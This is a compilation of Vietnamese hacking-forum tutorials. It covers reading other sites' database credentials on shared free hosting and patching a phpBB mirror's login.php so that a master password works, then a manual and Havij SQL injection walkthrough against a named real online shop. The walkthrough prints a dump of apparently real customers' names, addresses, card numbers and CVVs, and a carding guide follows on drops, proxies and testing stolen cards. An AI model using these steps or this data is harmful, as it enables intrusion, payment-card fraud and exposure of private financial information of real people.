###### Header Begin

Project Name: How to hack a localsite

Founder: Luke/Lukos

Found day: 31/08/2002

Use for Education and Experiences Only

###### Header End

Rất tình cờ, khi học PHP tôi tìm ra một cách để hack được một số Web Portal hoặc forum của hầu hết các free hosting như lycos.co.uk vv. Và tỉ lệ thành công là 100% tuy hơi mất thời gian

Trước hết cách này gần như kiểu hack qua Local Exploit để lấy Root's passwd, cái này chắc nhiều bạn cũng đã biết nhưng cũng khác chút ít. Vì vậy tôi cũng chỉ xin lấy một ví dụ là hack phpBB forum để làm mẫu chung cho các kiểu Portal hay forum khác.

Bước 1. Xác định URL website cần hack.

Do đây là free hosting nên website luôn có dạng http://root/yoursite

Và giả sử forum phpBB nằm tại URL sau http://root/victim/phpBB_path/

Chú ý là phải tìm đúng URL Root chứ không phải redirect hay forward ..

Bước 2. Đăng kí một hosting cùng trên server đó.

Vì đây là free hosting nên nếu victim đăng kí được thì bạn cũng có thể đăng kí dễ dàng

Giả sử bạn đăng kí một hosting như sau http://root/mysite/

Bước 3 Xác định DB info của Victim

Điều này rất dơn giản khi bạn với victim đang cùng trên một Local

Thật vậy có thể là /home/user_root/public_html/mysite/ hay /home/user_root/httpdocs/mysite/ tuỳ thuộc Control Panel của Server là lọai gì (Cpanel, Plesk, Enxim..). Nhưng điều này không cần chú ý.

3.1 Bạn tạo một file để lấy DB info của victim như sau

## getdb.php begin

<?php

$fd = fopen ("../victim/phpBB_path/config.php", "r");

while (!feof ($fd)) {

$line = fgets($fd,4000);

print $line;

}

fclose ($fd);

?>

## getdb.php end

Bạn có thể thay $fd bằng đường dẫn tới bất kì file php mà bạn muốn xem mã nguồn của nó. Vì đối với các loại Portal hoặc forum khác có thể DB Info không chứa trong file config.php như của phpBB

3.2 Upload file getdb.php

Bạn chỉ việc upload lên hosting mà bạn vừa đăng kí http://root/mysite/getdb.php

3.3 Lấy DB info của victim

Chạy file getdb.php vừa rồi trên Browser của bạn. Bạn sẽ thấy một màn hình trắng (blank). Đừng lo, bạn hãy "View source" và bạn sẽ thấy được các thông tin như sau

## getdb.php's source begin

<?php

// phpBB 2.x auto-generated config file

// Do not change anything in this file!

$dbms = "mysql4";

$dbhost = "localhost";

$dbname = "DB name here";

$dbuser = "DB user here";

$dbpasswd = "DB passwd here";

$table_prefix = "phpbb_";

define('PHPBB_INSTALLED', true);

?>

## getdb.php's source end

Xong bước thứ 3

Bước 4. Kiểm tra mật khẩu mà bạn vừa lấy được.

Với nick Admin trong forum và tất cả những gì có thể liên quan như passwd e-mail, hosting, domain .. Vì có thể nạn nhân dùng 1 passwd cho tất cả những mật khẩu của mình cho đỡ quên. Đây là một trong những thói quen chết người

Nếu mà thành công thì dừng tại đây nếu không hãy sang bước thứ 5

Bước 5. Tạo một mirror phpBB forum.

5.1 Nghĩa là sao, bạn hãy upload một phpBB forum cùng phiên bản với victim vào hosting của bạn http://root/mysite/

Và đừng Install forum này nếu bạn muốn hack nó.

5.2 Config forum vừa upload

Bạn hãy config cho forum của bạn thực sự là một mirror của victim's forum.

Điều đó có nghĩa là bạn phải link DB đến DB của victim, điều đó thật dễ dàng khi bạn đã có được DB info của victim trong tay.

5.2.1 Tạo file config.php

Đó là toàn bộ những gì bạn vừa "view source" được

## config.php source begin

<?php

// phpBB 2.x auto-generated config file

// Do not change anything in this file!

$dbms = "mysql4";

$dbhost = "localhost";

$dbname = "DB name here";

$dbuser = "DB user here";

$dbpasswd = "DB passwd here";

$table_prefix = "phpbb_";

define('PHPBB_INSTALLED', true);

?>

## config.php source end

5.2.2 Upload config.php

Bạn upload đè lên file config.php trong cái forum mới toanh mà bạn vừa upload.

http://root/mysite/config.php

5.2.3 Thử lại

Bạn thử gõ http://root/mysite/ xem, nếu mà forum của bạn có các thông số y hệt như của http://root/victim/phpBB_path tức là bạn đã thành công bước này

Bước 6. Sửa mã nguồn Mirror Site

Mục đích bước này là bạn sẽ sửa mã nguồn forum của bạn đề bạn có thể Login vào được Admin panel của nó. Nếu bạn học PHP thì việc này khá dễ dàng.

Tôi xin nêu ra 1 phương pháp, đó là cách crack cổ điển.

6.1 Crack cổ điển

6.1.1

Đó là khi bạn muốn crack passwd 1 file exe, bạn có thể deassebler nó ra thành file.asm bằng nhiều chương trình hiện nay

6.1.2

Tìm các lệnh nhảy có điều kiện (JP gì gì đó. Cái này có hàng đống mà). của đoạn code dòi mật khẩu

6.1.3

Sửa thành lệnh nhảy không điều kiên

6.1.4

Compile lại thành file exe và OK. Ta nhập bất cứ mật khẩu nào vào nó cũng chấp nhận

6.2 Sửa mã nguồn

Sửa ở file login.php và sẽ cho phép bạn Login dưới mọi nickname bằng 1 passwd chọn sẵn

6.2.1 Chọn mật khẩu chung cho toàn bộ các nick.

Thực sự các mật khẩu trong phpBB đã được mà hoá theo kiểu MD5, do đó có thể rất khó khăn để có thể giải mã nó. Nếu các bạn hiểu rõ về kiêu encode này thì các bạn có thể tự tìm cho mình mật khẩu thích hợp, nếu không các bạn có thể sử dụng mật khẩu đã được tôi giải mã là: "[email protected]"

Cái địa chỉ mail của tôi ấy mà, khi mật khẩu này được mã hoá theo MD5 nó sẽ là một mật khẩu như sau "692e2c95b693cf6fbec8ea5c40536b9e"

[email protected] => 692e2c95b693cf6fbec8ea5c40536b9e

6.2.2 Thiết lập mật khẩu chung cho toàn bộ các nick

Trước hết bạn mở file login.php ra tìm đoạn sau

## file login.php ..

define("IN_LOGIN", true);

define('IN_PHPBB', true);

$phpbb_root_path = './';

include($phpbb_root_path . 'extension.inc');

include($phpbb_root_path . 'common.'.$phpEx);

## file login.php ..

Chèn thêm biến $hack = "692e2c95b693cf6fbec8ea5c40536b9e";

Tức là sửa đoanj mã đó thành

## file login.php ..

define("IN_LOGIN", true);

define('IN_PHPBB', true);

$phpbb_root_path = './';

include($phpbb_root_path . 'extension.inc');

include($phpbb_root_path . 'common.'.$phpEx);

$hack = "692e2c95b693cf6fbec8ea5c40536b9e";

## file login.php ..

Tiếp đó tìm đoạn mã sau

## file login.php ..

else

{

if( md5($password) == $row['user_password'] && $row['user_active'] )

{

$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;

## file login.php ..

Sửa đoạn mã đó thành

## file login.php ..

else

{

if( md5($password) == $hack && $row['user_active'] )

{

$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;

## file login.php ..

Ghi lại file login.php

Bước 7.Login User với mật khẩu đã chọn

Bây giờ bạn có thể login vào diễn đàn qua website của bạn http://root/mysite/login.php với bất cứ nickname nào bằng mật khẩu mà bạn đã chọn. Ở đây là "[email protected]" kể cả là nick Admin, và vào được Admin Panel ..

Chú ý rằng ở website của bạn thì User chỉ có thể login với mật khẩu là [email protected] chứ không thể bằng bât kì mật khẩu khác kể cả đó là mật khẩu đúng

Tổng quát

I/Phương Pháp

-Đây là một ví dụ cho việc hack các website khi trong một local, không chỉ riêng đối với phpBB mà có thể áp dụng được cho nhiều Portal hay forum khác, tuy nhiên để có thể hack được từng loại bạn đều phải hiểu rất kĩ về nó và tránh lạm dụng quá đáng.

-Cách hack này tuy mất nhiều thời gian trong việc upload một mirror nhưng rất hiệu quả. Tuy nhiên tuyệt đối không nên sử dụng chúng lung tung và bừa bãi.

-Các hosting cho phép free, điều đó chứng tỏ họ rất tốt bụng, cũng chính vì vậy cũng không nên sử dụng phương pháp này khi KHÔNG THỰC SỰ cần thiết

II/Ví dụ.

-Trước hết tôi xin lỗi những ai đã làm website **** vì tôi sẽ đưa website của các bạn ra làm ví dụ và đã là victim đầu tiên của tôi.

-Mong các bạn, những người đang muốn học hỏi thêm một chút kinh nghiệm chỉ tham qua chứ không lạm dụng gi để làm hỏng DataBase của họ, thực sự tôi đã backup nhưng tôi cũng rất ngại restore lại. Hơn nữa để đảm bảo cho các bài viết tiếp theo không bị phản đối, tôi mong mọi người hãy tôn trọng ý kiến của tôi, KHÔNG PHÁ PHÁCH GÌ DB CỦA VICTIM và mang mục đích học hỏi và tham khảo lên hang đầu.

-Website mirror của website**** là **** , tại đây các bạn có thể login vào bất cứ nickname nào trong diễn đàn **** với mật khẩu chung là "[email protected]" . hãy nhớ là KHÔNG NÊN PHÁ DB CỦA HỌ, chi nên tham khảo

III/Kinh nghiệm

Điều quan trọng không phải là chúng ta hack được những cái gì mà là chúng ta học được những cái gì. Qua bài viết này mong các bạn nắm rõ được một số thao tác sau

-Đọc mã nguồn của một file bất kì trên website khi đã cùng một server (Bước 3)

-Kinh nghiệm về mật khẩu, dò tìm và ghi nhớ (Bước 4)

-Cách tạo một mirror website hay là cách link DB cho nhiều website (Bước 5)

-Cách crack cổ điển bằng ASM (Bước 6.1)

Các bạn nên tìm ra các mối liên hệ giữa các Portal, Forum, Guest Book, Chatroom PHP-CGI,.. để có thể áp dụng phương pháp này. Mặt khác các bạn cũng có thể hack được ngay cả đối với các domain hosting chứ không phải là các site có dạng http://root/yoursite/ . Và Các Paid hosting cũng không ngaọi trừ khả năng bị hack nếu các hacker đã thực sự muốn hack và sẵn sang bỏ tiền mua một hosting trên cùng một Server. Phần hack paid hosting và domain tôi xin để cho các bạn tự tìm hiểu. Hãy nhớ rằng luôn luôn phải chú ý đến URL Root của mỗi hosting. Ví dụ như ở Cpanel thì URL Root cho các domain hosting là http://[IP Server]/~user .vv

Chúc các bạn thành công

Hướng dẫn Hack Shop bằng tay và Havij

Tác giả: NgocBinh  Phân loại: Phân loại mặc định 

Gọi hack to lớn lắm chứ thực ra chẳng có gì đâu.

VICTIM: http://www.deanaccessories.com/index.php?do=products&category_id=18

Mới được share trên DF, làm TUT luôn :D

Phần 1: Bằng tay:

Site này lỗi Injection, không nói gì nhá: http://www.deanaccessories.com/index.php?do=products&category_id=18'

Đếm số column. Bạn để ý sự khác biệt trong 2 link sau:

http://www.deanaccessories.com/index.php?do=products&category_id=18 order by 1--

và

http://www.deanaccessories.com/index.php?do=products&category_id=18 order by 10--

Khi mình query order by 1, không có lỗi, tức là phép query TRUE.

Khi query 10 lỗi vì số column không tới 10 nên gặp lỗi.

Bạn hãy suy nghĩ, 10 lỗi, chưa chắc là số column là 9. lần lượt order by từ 1 tới 10.

Theo kinh nghiệm, mình sử dụng order by 10, nếu lỗi thì 5, phương pháp tìm kiếm đó :D

http://www.deanaccessories.com/index.php?do=products&category_id=18 order by 5--  <= TRUE

http://www.deanaccessories.com/index.php?do=products&category_id=18 order by 7--  <= TRUE

http://www.deanaccessories.com/index.php?do=products&category_id=18 order by 8--  <= TRUE

http://www.deanaccessories.com/index.php?do=products&category_id=18 order by 9--  <= FALSE

order by 8 TRUE, còn 9 lỗi suy ra có 8 column.

Tiếp tục union để lấy tables:

http://www.deanaccessories.com/index.php?do=products&category_id=18 and 1=0 union select 1,2,3,4,5,6,7,8--

Column lỗi là số 3 (nó sẽ hiện ra).

Tiếp theo sẽ lấy version của My SQL. Tại sao phải lấy???

Đối với Version 5, việc lấy các tables thì đơn giản, nhưng Version 4, phải đoán :(. Gặp Ver 4 là bỏ thôi

http://www.deanaccessories.com/index.php?do=products&category_id=18 and 1=0 union select 1,2,version(),4,5,6,7,8--

5.1.26-rc-5.1.26rc

Ver 5 này  :D

Giờ là lấy tables:

http://www.deanaccessories.com/index.php?do=products&category_id=18  and 1=0 union select 1,2,group_concat(table_name),4,5,6,7,8 from  information_schema.tables--

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,dean_admin_users,dean_attributes,dean_cart,dean_categories,dean_coupons,dean_orders,dean_orders_products,dean_products,dean_products_attributes,dean_reviews,dean_shipping,dean_sub_attributes

Thường thì CC hay chứa ở các table như order custommer, users. Ở đây mình thử coi cái table dean_orders xem.

Vào trang: http://www.string-functions.com/string-hex.aspx để converter chuỗi qua HEX để query.

Converter chuỗi: dean_orders sẽ được 6465616e5f6f7264657273

Tiếp theo lấy column:

http://www.deanaccessories.com/index.php?do=products&category_id=18  and 1=0 union select 1,2,group_concat(column_name),4,5,6,7,8 from  information_schema.columns where table_name  in(0x6465616e5f6f7264657273)--

order_id,customer_email,customer_phone,billing_fname,billing_lname,billing_address1,billing_address2,billing_city,billing_state,billing_zip,shipping_fname,shipping_lname,shipping_address1,shipping_address2,shipping_city,shipping_state,shipping_zip,coupon_code,coupon_code_total,cc_type,cc_number,cc_exp_month,cc_exp_year,cc_code,shipping_method,shipping_instructions,shipping_total,tax_name,tax_total,order_total,payment_method,remote_ip,order_date

Bạn thấy gì chưa: cc_number,cc_exp_month,cc_exp_year,cc_code CCV nè :-P

Lấy data nào:

http://www.deanaccessories.com/index.php?do=products&category_id=18  and 1=0 union select  1,2,group_concat(order_id,0x7c,billing_fname,0x7c,billing_lname,0x7c,billing_address1,0x7c,billing_address2,0x7c,billing_city,0x7c,billing_state,0x7c,billing_zip,0x7c,cc_type,0x7c,cc_number,0x7c,cc_exp_month,0x7c,cc_exp_year,0x7c,cc_code),4,5,6,7,8  from dean_orders--

7c là dấu | để ngăn cách column đó.

Cái gì nó hiện ra kìa  :D

256|DAWN  SORA|YANG|385 E GREEN STREET UNIT  2604||PASADENA|CA|91101|Visa|4356030403082778|4|2014|876,184|Ashley|Palmer|526  Via de la Valle Unit A||Solana  Beach|CA|92075|Visa|4217661433996162|2|2013|183,183|ryan|widger|1119  earl  street||philadelphia|PA|19125|Visa|4430480001337514|10|2011|759,233|Marek|Bute|10621  San Palatina St.||Las  Vegas|NV|89141|Visa|4868302094482000|1|2012|954,234|Adam|Best|30 W  90th|Apt 3C|New  York|NY|10024|Visa|4124570009851440|11|2011|242,237|Natalia|Hryckiwskyj|3008  Granite  Rd||Woodstock|MD|21163|Visa|4828500530055020|9|2011|602,239|Shannon|DeWolfe|720  W Grace  #1N||Chicago|IL|60613|Visa|4266841228278030|5|2012|104,169|Jaime|Halla|3600  Fillmore St. #308||San  Francisco|CA|94123|MasterCard|5287161991844013|7|2011|333,170|Stacey|Bloomston|120  Camellia  Drive||Birmingham|AL|35213|Visa|4325224200204374|12|2012|410,278|Terry|Miller|3408  Ashe Road  #D||Bakersfield|CA|93309|Visa|4460248704648609|5|2013|916,232|renee|zavislak|5235  diamond heights blvd.|apt. 226|san francisco|CA|94131|Visa|446542039

Không  phải chỉ có thế thôi nha, muốn lấy tiếp, ta cho điều kiện sau truy vấn  là order_id>=232. 232 là cái order_id của CC cuối trong trang này.

Một số shop bị xóa CC Num, để lọc, ta có thể thêm where cc_num>0. Đó là kinh nghiệm thôi nha :D

Phần 2: Bằng Havij:

Tool có thể down trên trang chủ: http://itsecteam.com/en/projects/project1_page2.htm

hoặc: http://www.mediafire.com/?tjv03bj5yy354a0

Mở Havij lên, dán link shop vào Target

http://www.deanaccessories.com/index.php?do=products&category_id=18

Nhớ rằng phải để cái id=xx.

Click Analyze.

Nó sẽ tự truy vấn và tìm database cho mình:

DB Server: MySQL >=5

Selected Column Count is 8

Finding string column

Valid String Column is 1

Target Vulnerable :D

Current DB: deanaccessories_com_-_main

Get Tables:

Click vào Get Tables sẽ ra các table có trong database deanaccessories_com_-_main.

Get Column:

Như nãy, ta biết CC nằm ở Table Dean_orders, vì vậy mình sẽ check chọn table dean_orders và click vào Get Columns

Highslide JS

     [Prev]    [Next]      [Close]      [Move]      

Check chọn những column cần thiết liên quan tới CC:

First name

Last name

Address 1

City

State

Zip

Country

CC num

CC EXP

CC Code

Chọn và click vào Get Data.

Count(*) of deanaccessories_com_-_main.dean_orders is 201

Tức là có 201 orders

Ngồi chờ cho nó Get xong và save data lại thôi :dalongnheo.

À, như phần 1, lọc điều kiện, nếu shop có nhiều order không có CC num, ta lọc bằng Havij như sau:

Click vào mũi tên bên cạnh nút Get Data chọn Filter:

Highslide JS

     [Prev]    [Next]      [Close]      [Move]      

gõ vào điều kiện của CC num, như shop này là: cc_number>0

Tức là chỉ lấy những data nào có column cc_number không trống.

Đơn giản và dễ hiểu phải không nào :D

END.

Mình còn newbie, các pro đừng chém nha :xh

TUT by phongdatgl

Bây giờ không phải khó trong việc hack shop, mà khó trong tìm shop, tìm dork shop  :(

-------------------------------------------------------------------------------------------------------------------------------

Cơ bản về Shipping

leech cho newbie đọc,nó cũng có 1 số chỗ giống cách đọc CC mà lãng du đã từng post nhưng có thêm vài điều mới cho newbie

search ở forum chưa thấy ai post lên lãng du post,nếu có rồi hoặc nó đã cũ xì thì mod del đi dùm lãng du nha

Begin :

Lời mở đầu

Các bài này được rút gọn tối đa, dùng từ ngữ cực kì gần gũi để cho newbabie có thể dễ dàng tiếp cận.

Bài học đầu tiên

Mục đích sử dụng credit card?

Trích:

1 - Shipping:

- Là hình thức mua hàng trên mạng bằng credit card, sau đó gửi về Việt Nam

- Nhắc tới ship, người ta thường nhắc tới Dropper:

Nước ngoài nó khinh VN mình đếch thèm giao dịch và chuyển hàng. Vì vậy chúng ta cần DROP (có nghĩa là 1 người sống ở nước ngoài nhận hàng giùm). Khi ship thì hàng được chuyển về địa chỉ của DROP, sau đó chúng ta ăn chia với DROP.

2 - Mua các tài sản ảo và bán lại cho những người có nhu cầu:

Tài sản ảo ở đây là server, host, domain, thẻ gọi điện thoại quốc tế, đồ chơi xịn của game online…

3 - Cashout

Muốn cashout thì nói chung phải có chút kiến thức về các hệ thống tiền tệ (để qua mặt nó), hoặc là học các kỹ thuật in thẻ ATM.

4 - Mua soft, mua tài khoản xxx, ebook …

Bài học số 2:

Các điều kiện cần và đủ trước khi sử dụng credit card (CC)?

1. Khái niệm:

- Bởi vì chủ thực sự của CC là người nước ngoài (USA, UK, CANADA,…) nên ko thể nào chúng ta ngồi ở VN mà sử dụng CC được.

- Mỗi máy tính khi truy cập vào internet đều được cấp cho 1 địa chỉ IP, nhớ địa chỉ IP mà người ta có thể dễ dàng biết được bạn ở đâu?

Đó là 2 lý do chúng ta phải FAKE IP, sau khi FAKE IP thì máy tính của bạn sẽ thông qua 1 địa chỉ IP ở USA, UK, … để truy cập vào internet.

2. Phân loại:

Để cho dễ hiệu, ta chia làm 2 loại:

+ Sock

+ Proxy

Các bạn cứ yên tâm, tự khắc khi sử dụng các bạn sẽ biết được cái nào là sock, cái nào la proxy. Đơn giản là vì khi tìm thấy chúng, ng ta đã ghi rõ sẵn là sock hay proxy

Nó sẽ có dạng như sau: 69.124.12.212:123 (69.124.12.212 là IP, 123 là PORT)

3. Kiểm tra Sock, Proxy còn sử dụng được hay không?

Có rất nhiều trang web giúp ta làm chuyện này, xin lấy VD 1 trang web khá tốt:

hxxp://www.checker.freeproxy.ru/checker/

5. Kiểm tra Sock, Proxy có phải là hàng tốt hay không?

hxxp://www.mxtoolbox.com/blacklists.aspx

Checking 67.185.248.54:1080 against 144 known blacklists…

Listed: 11 time(s)

Timeouts:5

Black List càng nhỏ thì có nghĩa là Sock, Proxy của chúng ta càng good. Trường hợp này blacklist của chúng ta là 11.

4. Cách FAKE IP:

+ Proxy:

- Tools –> Interner Opition –> Connections –> LAN Settings

- Check vào Use a proxy server…..

- Điền proxy vào như hình dưới

+ Sock:

- Tools –> Interner Opition –> Connections –> LAN Settings

- Check vào Use a proxy server…..

- Chọn Advanced

- Điền sock vào như hình dưới

Bài học số 3

Cách đọc và hiểu 1 Credit Card

Một Number Card thường gồm có 16 chữ số, có loại có 13 chữ số.

1. Phân loại:

Trong đó, 4 chữ số đầu tiên thường quy định và là dấu hiệu nhận dạng bởi các tên của ngân hàng phát hành Card đó

3xxx xxxx xxxx xxxx: Ameriacan Express Card

4xxx xxxx xxxx xxxx: Visa Card

5xxx xxxx xxxx xxxx: Master Card

6xxx xxxx xxxx xxxx: Discover Card

Đó là các ngân hàng phân loại. Còn chúng ta thì phân loại theo:

+ CC không có CVN (CVV): ko có “Card Verification Number”, ít nhưng vẫn xài được loại này, thường thì mua softwares…

+ CC có CVN (CVV): có Card Verification Number, có thể làm được rất nhiều chuyện như trong bài 1 đã liệt kê.

+ CC full info (có thêm login bank và Pin ATM): cái này dùng để cashout.

2. Cách đọc:

Thường CC sau khi hack từ Shop ra sẽ có dạng này:

13774/Carole/Kirner/8 Hunter Ct./Montgomery/IL/60538/US/[email protected]/630-896-7525/13774/60538/Carole Kirner/2/549123701563xxxx /12/6/799/

Lần đầu khó phân biệt, riết sẽ quen thôi:

+ First Name: Carole

+ Last Name: Kirner

+ Address: 8 Hunter Ct.

+ City: Montgomery

+ State: IL

+ Zipcode: 60538

+ Phone: 630-896-7525

+ CC Number: 549123701563xxxx

+ CVV: 799

+ Date Exp:12/6

Bài học số 4

Cách check CC xem live hay die?

Áp dụng bài 2 để FAKE IP, hiểu được các thông số của CC ở bài 3, bây giờ các bạn phải biết cách kiểm tra xem CC đó còn dùng được nữa không. Có 2 phương pháp:

1. Đem đi dùng luôn, nếu CC live thì thành công luôn, còn nếu die thì bỏ, tìm CC khác, khỏi mắc công check đi check lại lôi thôi. Nhưng nhớ mỗi lần FAIL thì các bạn nên clear cookie rồi hãy thử lại bằng 1 con CC khác. Ko đâu check CC good bằng chỗ mình cần sử dụng CC.

2. Cẩn thận hơn, các bạn có thể check trước, rồi mới đi dùng. Mình khuyến khích dùng WALLET (đến giờ mình vẫn dùng WALLET).

Hướng dẫn check CVV ở WALLET !

Thấy nhiều anh em newbie gặp khó khăn trong việc check CVV và không bít check ở đâu cho cool , tôi khuyến khích anh em nen check Wallet , tuy hơi lâu 1 chút nhưng rất cool , wa được wallet thì đảm bảo anh em dùng con CVV đó làm gì cũng OK , kô paygate nào là không qua , ship hàng thoải mái. Sau đây xin hướng dẫn cụ thể . Hi vọng anh em check thành công .

********************************

Về cơ bản , anh em login vào wallet bình thường : xxx.wallet.yahoo.com , sau đó chọn Add new payment method và chuyển đến trang Add payment method .

Anh em cần điền info như sau :

* Cardtype : Amex, Visa ….

* Cardnumber : Paste CC number cần check vào

* Card Verification : Điền CVV2 number

* Expiration Date: Điền ngày hết hạn CC

* Name on Card: Điền full name của chủ thẻ

* Nickname: Cái này là mới , bắt buột phải điền , khuyến khích anh em sẵn tay paste name của chủ thẻ vào luôn rồi xóa bớt firstname hoặc lastnname là nhanh gọn nhất ( sau này có muốn bít con CC đó đã check chưa chỉ cần nhìn nickname là bít ) . Thật ra cái này điền gì cũng được nhưng nếu anh em điền không đúng thì lôi thôi , tôi thấy nhiều người bị dính ở chỗ này.

* Billing Address: Cái này anh em điền cái gì cũng được cứ gõ đại , chẳng hạn tôi gõ : 121321sasfasfs….

* City: Cũng như Billing Address , điền gì cũng đượ

* State: Chọn đúng state của CVV

* Zip/Postal Code: Điền đúng zip của state ở trên , cái này là quan trọng , nếu không đúng YH sẽ báo lỗi.

* Telephone Number: Cái này thì sẵn tay paste luôn cái số nó ví dụ ở dưới vào cho nhanh.

Sau đó anh em nhấn Continue , nếu nó báo như thế này thì OK , con đó live , vác đi chiến nhé

(McSloy là nickname mà tôi chọn , ở đây là lastname luôn).

Nếu bị như vậy thì con đó die , anh em đổi con khác làm lại như lúc đầu

Nhược điểm là nó chỉ cho add tối đa 10 con , nhưng không sao , anh em check xong live thì có thể del nó ra khỏi list để check tiếp.